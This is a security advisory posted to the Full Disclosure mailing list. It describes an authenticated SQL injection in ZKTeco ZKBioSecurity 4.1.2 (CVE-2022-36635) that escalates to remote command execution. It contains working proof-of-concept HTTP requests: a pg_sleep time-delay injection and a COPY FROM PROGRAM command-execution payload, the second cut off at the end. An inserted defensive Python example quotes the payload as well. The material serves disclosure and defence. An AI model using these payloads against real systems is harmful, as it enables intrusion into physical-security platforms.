Message-ID: <CAFBQuL5KA2JjM1UBLijt3mB52=EhnrhjZZ5OC90J+T2_z1+iTQ@mail.gmail.com>
Date: Thu, 29 Sep 2022 11:16:47 -0300
From: Caio B <caioburgardt@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] ZKBiosecurity - Authenticated SQL Injection resulting in RCE (CVE-2022-36635)

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)

Version Affected: 4.1.2

CVE: CVE-2022-36635

Vulnerability: SQL Injection (with a plus: RCE)

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The parameters opTimeBegin and opTimeEnd are concatenated directly into the SQL
query, with only a sanitization filter in front of them. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.
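The root cause above is a blacklist filter guarding string concatenation. As an added example (not the advisory's or ZKTeco's code), the snippet below rebuilds the time-range count the endpoint performs the way a defender would: opTimeBegin/opTimeEnd are accepted only as complete timestamps and then bound as query parameters, so no comment, quote or semicolon can reach the SQL. The table and rows are constructed stand-ins, and is_injection_attempt is a hypothetical helper for flagging such requests in logs.

```python
import sqlite3
from datetime import datetime

# Constructed sample inputs (not from a live system): two legitimate values and
# the shape of the advisory's time-delay payload as seen after URL decoding.
LEGIT_BEGIN = "2022-06-26 00:00:00"
LEGIT_END = "2022-09-26 23:59:59"
INJECTED = ("2022-06-26 00:00:00')/**/tmp_count;select/**/pg_sleep(10);"
            "/**/select 1 from BASE_OPLOG/**/WHERE/**/'1'='1")

TIME_FMT = "%Y-%m-%d %H:%M:%S"


def parse_op_time(value: str) -> str:
    """Allowlist validation: accept only a complete 'YYYY-MM-DD HH:MM:SS' stamp.
    strptime rejects any trailing data, and re-serialising the parsed datetime
    guarantees that only the timestamp itself is ever passed on."""
    return datetime.strptime(value, TIME_FMT).strftime(TIME_FMT)


def count_oplog(conn: sqlite3.Connection, begin: str, end: str) -> int:
    """The time-range count the advisory's endpoint performs, rebuilt safely:
    inputs are validated, then bound as parameters, never concatenated."""
    begin, end = parse_op_time(begin), parse_op_time(end)
    cur = conn.execute(
        "SELECT count(1) FROM base_oplog WHERE create_time BETWEEN ? AND ?",
        (begin, end),
    )
    return cur.fetchone()[0]


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the BASE_OPLOG table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE base_oplog (create_time TEXT)")
    conn.executemany(
        "INSERT INTO base_oplog VALUES (?)",
        [("2022-06-01 09:00:00",), ("2022-07-15 12:30:00",),
         ("2022-10-01 08:00:00",)],
    )
    return conn


def is_injection_attempt(value: str) -> bool:
    """Hypothetical detection helper: a value that is not a strict timestamp
    has no legitimate reason to appear in opTimeBegin/opTimeEnd."""
    try:
        parse_op_time(value)
        return False
    except ValueError:
        return True
```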

#######################PROOF OF CONCEPT#######################

Note that the response to this request is delayed by 10 seconds (pg_sleep(10)):

POST /baseOpLog.do HTTP/1.1
Host: {HOST}
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION={COOKIE}; menuType=icon-only
Content-Length: 208

list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50

Sending the following request body instead executes an operating-system command on the server (via COPY ... FROM PROGRAM):

list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='


#######################END#######################
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/